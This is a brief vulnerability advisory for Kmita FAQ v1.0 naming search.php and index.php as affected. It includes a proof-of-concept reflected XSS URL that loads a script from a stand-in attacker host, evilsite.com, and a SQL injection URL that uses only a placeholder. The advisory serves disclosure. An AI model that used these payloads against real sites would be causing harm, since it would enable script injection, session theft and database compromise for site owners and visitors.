Kmita FAQ v1.0 suffers from XSS and SQL injection.
2ed382af22747187e2bc4a01d9a4d50ab541a5e7df12508a0290e7836a5974b6
Kmita FAQ v1.0
Homepage:
http://www.kmita-faq.com
Effected files:
search.php
index.php
Search.php does not sanatize user input before dynamically genrating it.
Proof of concept:
http://www.example.com/search.php?q=<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>
SQL Injection proof of concept:
http://www.example.com/index.php?catid=[SQL]